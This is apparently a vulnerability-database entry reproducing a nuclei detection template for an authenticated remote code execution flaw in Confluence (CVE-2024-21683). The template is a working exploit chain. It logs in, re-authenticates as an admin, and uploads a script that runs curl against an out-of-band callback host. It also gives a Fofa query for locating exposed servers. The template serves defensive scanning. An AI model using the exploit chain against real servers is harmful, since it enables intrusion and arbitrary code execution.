nuclei | ProjectDiscovery | NUCLEI:CVE-2024-21683
May 24, 2024 - 9:22 p.m.

Atlassian Confluence Data Center and Server - Remote Code Execution

2024-05-24 21:22:59
ProjectDiscovery
github.com
Tags: cve, atlassian, confluence, rce, authenticated, intrusive, remote code execution

CVSS3: 8.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score: 9
Confidence: High

EPSS: 0.947
Percentile: 99.3%

Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.

id: CVE-2024-21683

info:
  name: Atlassian Confluence Data Center and Server - Remote Code Execution
  author: pdresearch
  severity: high
  description: |
    Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.
  reference:
    - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html
    - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21683
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145
    - https://jira.atlassian.com/browse/CONFSERVER-95832
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 8.3
    cve-id: CVE-2024-21683
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 3
    fofa-query: "app=\"ATLASSIAN-Confluence\""
  tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive
variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{username}}&os_password={{password}}&login=Log+in&os_destination=

      - |
        POST /doauthenticate.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Atlassian-Token: no-check

        password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action

      - |
        POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
        Host: {{Hostname}}
        X-Atlassian-Token: no-check
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE

        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js"
        Content-type: text/javascript

        new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start()
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="newLanguageName"

        {{randstr}}
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE--

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302 && status_code_2 == 302
          - contains(interactsh_protocol, 'dns')
          - contains(body_3, "confluence")
        condition: and
# digest: 4b0a00483046022100c28962a7e265cc6de6b2f4ff178c62e7cf092b4f48154a8007dbd880ce7ebb64022100c14be3544d81d99ae0f2196c504637e743b2148ad6f655ef7c311cbb8f7419a5:922c64590222798bb761d5b6d8e72950
